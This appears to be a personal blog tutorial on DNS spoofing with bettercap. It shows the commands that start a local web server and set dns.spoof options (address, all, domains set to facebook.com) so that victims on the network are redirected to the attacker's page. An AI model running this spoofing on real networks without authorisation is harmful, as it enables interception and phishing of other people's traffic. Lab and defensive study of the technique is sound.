4ag2's Blog

Bettercap DNS Spoofing

4ag2's photo
4ag2
·

0 min read

From the previous article of the bettercap installation, we list down many type of attacks. Among them we have the possibility to do "DNS spoofing".

How does DNS Spoofing work?

While browsing, a DNS request goes from client to the DNS server to be resolved and translated into an IP address of the domain name asked (website).

The senario of spoofing is as follow:

The request of DNS goes to the hacker ( aka Man In The Middle) before reaching out the DNS server, where bettercap is being explicitly used to redirect a wrong IP address for that request containing a backdoor or an evil website.. etc.

To set this up follow these steps:

First:

You should have a "where to redirect our target to" ( for example a website ), I will be using a basic example where I launch a web server and a simple web page to be redirected to:

service apache2 start

The page will be hosted with the machine IP address

cd /var/www/html

The " index.html " is the one running on our web server by default, it could be modified.

Now:

We should know how to use the bettercap module "dns.spoof", a good approach is to use help command:

touch /root/spoof.cap #  = > to intercept data and modify it.
bettercap -iface eth0  -caplet /root/spoof.cap
help dns.spoof

Results are as follow:

dns.spoofing.changeme.png

Parameters to be set::

  1. dns.spoof.address => the IP address of the page we created to be redirected to.
  2. dns.spoof.all => if set to "true" it will be responding to any dns request.
  3. dns.spoof. domains => the domains we want to target and spoof can be many separated by ",".

dns.spoof.address:

set dns.spoof.address <ip address of your redirected to page >

dns.spoof.all:

set dns.spoof.all true

dns.spoof.domains:

set dns.spoof.domains facebook.com

dns.spoof.3.png

RUN:

dns.spoof on

dns.spoofing.4.png

After:

In an other machine if it request our target ( meaning choose the web site to be targeted e.g: "facebook.com" ) it will be redirected to the web page we created:

dnsspoof2.png Meanwhile in the attacker machine: updatednsspoofing.png

The END

This is one of the tools that the swiss army knife bettercap can do, I wish it was useful and you learn something.

Thanks for reading, if you struggle make sure to comment bellow and I will be glad to help.

Feel free to check the tutorials I have posted about bettercap tools. Have fun.